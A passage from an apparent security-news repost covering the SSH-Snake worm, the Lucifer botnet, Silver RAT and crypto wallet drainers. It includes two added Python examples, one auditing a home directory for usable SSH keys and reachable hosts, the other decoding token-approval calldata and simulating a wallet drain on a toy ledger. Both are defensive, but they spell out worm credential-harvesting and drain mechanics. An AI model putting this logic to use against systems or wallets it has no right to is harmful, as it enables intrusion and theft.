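                                        "git pull\nssh web02\n")
    return home


if __name__ == "__main__":
    import json
    print(json.dumps(audit(build_demo_home()), indent=2))
```

The unencrypted_keys list is what an attacker running the tool from this account could use without a single extra secret, and history_targets is the first hop list it would try them against; a key that is both plaintext and named in a history line with a reachable host is the pairing to fix first. Point audit() at a real home directory to run it outside the demo.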


“It’s completely self-replicating and self-propagating – and completely fileless,” according to the project’s description. “In many ways, SSH-Snake is actually a worm: It replicates itself and spreads itself from one system to another as far as it can.”

Sysdig said the shell script not only facilitates lateral movement, but also provides more stealth and flexibility than other typical SSH worms.

The cloud security company said it observed threat actors deploying SSH-Snake in real-world attacks after discovering a command-and-control (C2) server hosting the harvested output: credentials, the IP addresses of the targets, and bash command history.

“The usage of SSH keys is a recommended practice that SSH-Snake tries to take advantage of in order to spread,” Hernández said. “It is smarter and more reliable which will allow threat actors to reach farther into a network once they gain a foothold.”

When reached for comment, Joshua Rogers, the developer of SSH-Snake, told The Hacker News that the tool offers legitimate system owners a way to identify weaknesses in their infrastructure before attackers do, urging companies to use SSH-Snake to “discover the attack paths that exist – and fix them.”

“It seems to be commonly believed that cyber terrorism ‘just happens’ all of a sudden to systems, which solely requires a reactive approach to security,” Rogers said. “Instead, in my experience, systems should be designed and maintained with comprehensive security measures.”

“If a cyber terrorist is able to run SSH-Snake on your infrastructure and access thousands of servers, focus should be put on the people that are in charge of the infrastructure, with a goal of revitalizing the infrastructure such that the compromise of a single host can’t be replicated across thousands of others.”

Rogers also called attention to the “negligent operations” by companies that design and implement insecure infrastructure, which can be easily taken over by a simple shell script.

“If systems were designed and maintained in a sane manner and system owners/companies actually cared about security, the fallout from such a script being executed would be minimized – as well as if the actions taken by SSH-Snake were manually performed by an attacker,” Rogers added.

“Instead of reading privacy policies and performing data entry, security teams of companies worried about this type of script taking over their entire infrastructure should be performing total re-architecture of their systems by trained security specialists – not those that created the architecture in the first place.”
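The attack-path discovery Rogers describes can be approximated from the defender's side without running a worm at all. The Python script below is an added example written for this page, not SSH-Snake's own code and not Sysdig's: it walks one user's home directory, separates passphrase-less private keys (the only ones a worm can use unattended) from protected ones, collects the hosts named in known_hosts, the ssh config and the shell history, and emits the key-to-host pairs an attacker on that box would try first. It never opens a connection. The key headers, hostnames and addresses in demo() are constructed fixtures, and OPT_WITH_ARG is a deliberately short approximation of ssh's option parsing.

```python
"""Added example, not SSH-Snake's own code: audit a home directory for what an
SSH worm needs (passphrase-less private keys plus the hosts named in known_hosts,
ssh config and shell history) and list the key-to-host edges such a tool would
try. It never connects anywhere. Every key, hostname and IP in demo() is a
constructed fixture."""
import base64
import os
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"
OPT_WITH_ARG = {"-p", "-P", "-i", "-o", "-l", "-J", "-F"}  # ssh/scp options that eat the next token

def is_key_encrypted(text):
    """True if the key needs a passphrase, False if usable as-is, None if not a key."""
    if "PRIVATE KEY-----" not in text:
        return None
    if "Proc-Type: 4,ENCRYPTED" in text or "BEGIN ENCRYPTED PRIVATE KEY" in text:
        return True  # legacy PEM or PKCS#8 with a passphrase
    if "BEGIN OPENSSH PRIVATE KEY" not in text:
        return False  # plain PEM (RSA/EC/DSA/PKCS#8) without encryption headers
    raw = base64.b64decode("".join(l for l in text.splitlines() if not l.startswith("-----")))
    if not raw.startswith(OPENSSH_MAGIC):
        return True  # malformed: do not count it as a ready-to-use key
    (n,) = struct.unpack(">I", raw[15:19])
    return raw[19:19 + n] != b"none"  # ciphername "none" means no passphrase

def hosts_from_known_hosts(text):
    hosts = set()
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith(("#", "|1|")):  # skip comments and hashed entries
            for name in line.split()[0].split(","):  # "host" or "[host]:port"
                hosts.add(name[1:].rsplit("]:", 1)[0] if name.startswith("[") else name)
    return hosts

def hosts_from_ssh_config(text):
    hosts = set()
    for parts in (line.split() for line in text.splitlines()):
        if len(parts) >= 2 and parts[0].lower() in ("host", "hostname"):
            hosts.update(p for p in parts[1:] if not any(c in p for c in "*?!"))
    return hosts

def hosts_from_history(text):
    hosts = set()
    for toks in (line.split() for line in text.splitlines()):
        if not toks or toks[0] not in ("ssh", "scp", "sftp"):
            continue
        skip = False
        for tok in toks[1:]:
            if skip or tok in OPT_WITH_ARG:
                skip = tok in OPT_WITH_ARG
                continue
            if tok.startswith("-"):
                continue
            if "@" in tok:
                hosts.add(tok.split("@", 1)[1].split(":", 1)[0])  # user@host[:path]
            elif ":" in tok and toks[0] != "ssh":
                hosts.add(tok.split(":", 1)[0])  # scp/sftp host:path
            elif toks[0] == "ssh":
                hosts.add(tok)
            if toks[0] == "ssh":
                break  # first positional arg is the host; the rest is a remote command
    return hosts

def _read(path):
    with open(path, errors="replace") as f:
        return f.read()

def audit_home(home):
    keys, targets = {"unencrypted": [], "encrypted": []}, set()
    ssh_dir = os.path.join(home, ".ssh")
    for name in (sorted(os.listdir(ssh_dir)) if os.path.isdir(ssh_dir) else []):
        path = os.path.join(ssh_dir, name)
        if not os.path.isfile(path):
            continue
        text = _read(path)
        if name == "known_hosts":
            targets |= hosts_from_known_hosts(text)
        elif name == "config":
            targets |= hosts_from_ssh_config(text)
        elif (enc := is_key_encrypted(text)) is not None:
            keys["encrypted" if enc else "unencrypted"].append(path)
    hist = os.path.join(home, ".bash_history")
    if os.path.exists(hist):
        targets |= hosts_from_history(_read(hist))
    # A worm tries every usable key against every known host: these edges are what to fix.
    paths = [(k, h) for k in keys["unencrypted"] for h in sorted(targets)]
    return {"keys": keys, "targets": targets, "attack_paths": paths}

def openssh_key_fixture(cipher):
    """Constructed OpenSSH-format key header (no key material) for exercising the check."""
    raw = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher
    return "-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n-----END OPENSSH PRIVATE KEY-----\n" % base64.b64encode(raw).decode()

def demo():
    """Write a constructed home directory to a temp dir and audit it."""
    files = {
        ".ssh/id_ed25519": openssh_key_fixture(b"none"),
        ".ssh/id_ecdsa": openssh_key_fixture(b"aes256-ctr"),
        ".ssh/id_rsa": "-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n\nAAAA\n-----END RSA PRIVATE KEY-----\n",
        ".ssh/known_hosts": "10.0.0.5 ssh-ed25519 AAAA\n[bastion.example.internal]:2222 ssh-rsa AAAA\n|1|abc=|def= ssh-rsa AAAA\n",
        ".ssh/config": "Host db\n  HostName 10.0.0.9\nHost *\n  ServerAliveInterval 30\n",
        ".bash_history": "ls -la\nssh deploy@app01.example.internal uptime\nscp backup.tgz 10.0.0.5:/tmp/\n",
    }
    home = tempfile.mkdtemp()
    os.mkdir(os.path.join(home, ".ssh"))
    for rel, content in files.items():
        with open(os.path.join(home, rel), "w") as f:
            f.write(content)
    return audit_home(home)
```

Run it as `audit_home(os.path.expanduser("~"))` on a host you own; every pair in `attack_paths` is either a key that should get a passphrase (or live only in an agent) or a host that should not trust that key. Hashed known_hosts entries are skipped because the hostname cannot be recovered from them, which is also why `HashKnownHosts yes` blunts this kind of harvesting.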


The disclosure comes as Aqua uncovered a new campaign by the Lucifer botnet that exploits misconfigurations and known flaws in Apache Hadoop and Apache Druid to corral compromised servers into a network for mining cryptocurrency and staging distributed denial-of-service (DDoS) attacks.

Lucifer, a hybrid cryptojacking malware, was first documented by Palo Alto Networks Unit 42 in June 2020, when the researchers called attention to its ability to exploit known security flaws to compromise Windows endpoints.


As many as 3,000 distinct attacks aimed at the Apache big data stack have been detected over the past month, the cloud security firm said. These include attacks that single out vulnerable Apache Flink instances to deploy miners and rootkits.

“The attacker implements the attack by exploiting existing misconfigurations and vulnerabilities in those services,” security researcher Nitzan Yaakov said.

“Apache open-source solutions are widely used by many users and contributors. Attackers may view this extensive use as an opportunity to have inexhaustible resources for implementing their attacks on them.”

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

Syrian Hackers Distributing Stealthy C#-Based Silver RAT to Cybercriminals
http://www.indiavpn.org/2024/01/08/syrian-hackers-distributing-stealthy-c-based-silver-rat-to-cybercriminals/
Mon, 08 Jan 2024 14:32:58 +0000

Jan 08, 2024 Newsroom Malware / Cybercrime


Threat actors operating under the name Anonymous Arabic have released a remote access trojan (RAT) called Silver RAT that’s equipped to bypass security software and stealthily launch hidden applications.

“The developers operate on multiple hacker forums and social media platforms, showcasing an active and sophisticated presence,” cybersecurity firm Cyfirma said in a report published last week.

The actors, assessed to be of Syrian origin and linked to the development of another RAT known as S500 RAT, also run a Telegram channel offering various services such as the distribution of cracked RATs, leaked databases, carding activities, and the sale of Facebook and X (formerly Twitter) bots.


The social media bots are then utilized by other cyber criminals to promote various illicit services by automatically engaging with and commenting on user content.

In-the-wild detections of Silver RAT v1.0 were first observed in November 2023, although the threat actor’s plans to release the trojan were first made official a year before. It was cracked and leaked on Telegram around October 2023.

The C#-based malware boasts a wide range of features: connecting to a command-and-control (C2) server, logging keystrokes, destroying system restore points, and even encrypting data as ransomware. There are also indications that an Android version is in the works.


“While generating a payload using Silver RAT’s builder, threat actors can select various options with a payload size up to a maximum of 50kb,” the company noted. “Once connected, the victim appears on the attacker-controlled Silver RAT panel, which displays the logs from the victim based on the functionalities chosen.”

An interesting evasion feature built into Silver RAT is its ability to delay the execution of the payload by a specific time as well as covertly launch apps and take control of the compromised host.


Further analysis of the malware author’s online footprint shows that one of the members of the group is likely in their mid-20s and based in Damascus.

“The developer […] appears supportive of Palestine based on their Telegram posts, and members associated with this group are active across various arenas, including social media, development platforms, underground forums, and Clearnet websites, suggesting their involvement in distributing various malware,” Cyfirma said.

Scam-as-a-Service Aiding Cybercriminals in Crypto Wallet-Draining Attacks
http://www.indiavpn.org/2023/12/30/scam-as-a-service-aiding-cybercriminals-in-crypto-wallet-draining-attacks/
Sat, 30 Dec 2023 11:05:33 +0000

Dec 30, 2023 Newsroom Cryptocurrency / Phishing Scam


Cybersecurity researchers are warning about an increase in phishing attacks that are capable of draining cryptocurrency wallets.

“These threats are unique in their approach, targeting a wide range of blockchain networks, from Ethereum and Binance Smart Chain to Polygon, Avalanche, and almost 20 other networks by using a crypto wallet-draining technique,” Check Point researchers Oded Vanunu, Dikla Barda, and Roman Zaikin said.

A prominent contributor to this troubling trend is a notorious phishing group called Angel Drainer, which advertises a “scam-as-a-service” offering by charging a percentage of the stolen amount, typically 20% or 30%, from its collaborators in return for providing wallet-draining scripts and other services.

In late November 2023, a similar wallet-draining service known as Inferno Drainer announced that it was shutting down its operations for good after helping scammers plunder over $70 million worth of crypto from 103,676 victims since its launch in late 2022.

Web3 anti-scam solution provider Scam Sniffer, in May 2023, described the service as specializing in multi-chain scams and charging 20% of the stolen assets.

“It has been a long ride with all of you and we’d like to thank you from heart [sic],” the actor said in a message posted on its Telegram channel.

“A big thanks to everyone who has worked with us such as Drakan and every other customer, we hope you can remember us as the best drainer that has ever existed and that we succeeded in helping you in the quest of making money.”

At the crux of these services is a crypto-draining kit built to transfer cryptocurrency out of victims’ wallets without their consent.

This is typically accomplished via airdrop or phishing scams, tricking targets into connecting their wallets on counterfeit websites that are propagated via malvertising schemes or unsolicited emails and messages on social media.


Earlier this month, Scam Sniffer detailed a phishing scam in which bogus ads for cryptocurrency platforms on Google and X (formerly Twitter) redirected users to sketchy sites that drained funds from users’ digital wallets.

“The user is induced to interact with a malicious smart contract under the guise of claiming the airdrop, which stealthily increases the attacker’s allowance through functions like approve or permit,” Check Point noted.

“Unknowingly, the user grants the attacker access to their funds, enabling token theft without further user interaction. Attackers then use methods like mixers or multiple transfers to obscure their tracks and liquidate the stolen assets.”

To mitigate the risks posed by such scams, users are recommended to employ hardware wallets for enhanced security, verify the legitimacy of smart contracts, and periodically review wallet allowances for signs of any suspicious activity.
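The approve/permit trick Check Point describes and the allowance review it recommends can both be shown in a few lines. The Python block below is an added example written for this page, not Check Point's, Scam Sniffer's or any drainer kit's code: it decodes the raw calldata a wallet displays before signing (using the standard ERC-20, OpenZeppelin and EIP-2612 function selectors), flags a spending grant to an address outside the user's trusted list, then replays the drain against a toy ERC-20 ledger to show that once an unlimited allowance exists the attacker's transferFrom needs nothing further from the victim. The victim, attacker and router addresses, the calldata and the 2**128 "effectively unlimited" threshold are constructed for the example; the ledger's infinite-allowance convention follows OpenZeppelin's ERC-20, which not every token shares.

```python
"""Added example (not Check Point's, Scam Sniffer's or any drainer's code):
decode what a wallet asks the user to sign, flag spending grants to untrusted
addresses, and replay the resulting drain against a toy ERC-20 ledger.
Addresses, calldata and thresholds below are constructed for illustration."""

MAX_UINT256 = 2**256 - 1
# 4-byte selectors: first 4 bytes of keccak256 over the canonical signature.
SELECTORS = {
    "095ea7b3": ("approve", ("address", "uint256")),             # ERC-20
    "39509351": ("increaseAllowance", ("address", "uint256")),   # OpenZeppelin ERC-20
    "a22cb465": ("setApprovalForAll", ("address", "bool")),      # ERC-721 / ERC-1155
    "d505accf": ("permit", ("address", "address", "uint256", "uint256",
                            "uint8", "bytes32", "bytes32")),     # EIP-2612: owner, spender, value, ...
}
SPENDER_INDEX = {"approve": 0, "increaseAllowance": 0, "setApprovalForAll": 0, "permit": 1}
UNLIMITED = 2**128  # constructed heuristic: anything this large is a blanket grant

def decode_calldata(data):
    """Split 0x<selector><32-byte words> into a function name and typed values."""
    data = data.lower()
    data = data[2:] if data.startswith("0x") else data
    sel, args = data[:8], data[8:]
    if sel not in SELECTORS or len(args) % 64:
        return None
    name, types = SELECTORS[sel]
    words = [args[i:i + 64] for i in range(0, len(args), 64)]
    if len(words) != len(types):
        return None
    values = []
    for typ, w in zip(types, words):
        if typ == "address":
            values.append("0x" + w[-40:])  # address is right-aligned in its word
        elif typ == "bool":
            values.append(int(w, 16) != 0)
        elif typ == "bytes32":
            values.append("0x" + w)
        else:
            values.append(int(w, 16))
    return {"function": name, "values": values}

def assess(decoded, trusted_spenders):
    """Verdict for a decoded call: who gains spending rights and how much."""
    if decoded is None or decoded["function"] not in SPENDER_INDEX:
        return {"risk": "none"}
    fn, vals = decoded["function"], decoded["values"]
    if fn == "setApprovalForAll" and not vals[1]:
        return {"risk": "none"}  # a revocation, not a grant
    spender = vals[SPENDER_INDEX[fn]]
    # setApprovalForAll(True) hands over a whole collection; the others carry an amount.
    unlimited = vals[1] if fn == "setApprovalForAll" else vals[SPENDER_INDEX[fn] + 1] >= UNLIMITED
    if spender.lower() in {t.lower() for t in trusted_spenders}:
        risk = "low"
    else:
        risk = "high" if unlimited else "medium"
    return {"function": fn, "spender": spender, "unlimited": unlimited, "risk": risk}

class Token:
    """Minimal ERC-20 bookkeeping with EIP-20 approve/transferFrom semantics."""
    def __init__(self, balances):
        self.balances, self.allowance = dict(balances), {}

    def approve(self, owner, spender, amount):
        self.allowance[(owner, spender)] = amount  # replaces any earlier value

    def transfer_from(self, caller, owner, to, amount):
        allowed = self.allowance.get((owner, caller), 0)
        if amount > allowed or amount > self.balances.get(owner, 0):
            raise PermissionError("insufficient allowance or balance")
        if allowed != MAX_UINT256:  # OpenZeppelin convention: an infinite allowance is never decremented
            self.allowance[(owner, caller)] = allowed - amount
        self.balances[owner] -= amount
        self.balances[to] = self.balances.get(to, 0) + amount

def review_allowances(token, owner, trusted_spenders):
    """The periodic check the article recommends: live allowances to untrusted spenders."""
    trusted = {t.lower() for t in trusted_spenders}
    return sorted((s, amt) for (o, s), amt in token.allowance.items()
                  if o == owner and amt > 0 and s.lower() not in trusted)

VICTIM = "0x" + "11" * 20
ATTACKER = "0x" + "d3adbeef" * 5  # constructed placeholder, 20 bytes
ROUTER = "0x" + "22" * 20         # stands in for a DEX router the user really uses
TRUSTED = {ROUTER}
# Constructed calldata for approve(ATTACKER, MAX_UINT256): what a fake "claim airdrop" page submits.
APPROVE_CALLDATA = "0x095ea7b3" + "0" * 24 + "d3adbeef" * 5 + "f" * 64

def demo():
    decoded = decode_calldata(APPROVE_CALLDATA)
    verdict = assess(decoded, TRUSTED)
    token = Token({VICTIM: 1000})
    token.approve(VICTIM, decoded["values"][0], decoded["values"][1])  # the victim signs the "claim"
    token.transfer_from(ATTACKER, VICTIM, ATTACKER, 1000)  # later, with no victim interaction
    return {"verdict": verdict, "victim_balance": token.balances[VICTIM],
            "attacker_balance": token.balances[ATTACKER],
            "to_revoke": review_allowances(token, VICTIM, TRUSTED)}
```

The useful habit this encodes is to read the decoded spender and amount before signing rather than the page's "claim" button, and to treat any `approve` or `setApprovalForAll` whose spender you cannot name as the drain itself: the theft happens in a later transaction the victim never sees. A real review of on-chain allowances queries each token's `allowance(owner, spender)` or an indexer, but the decision rule is the same as in `review_allowances`.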
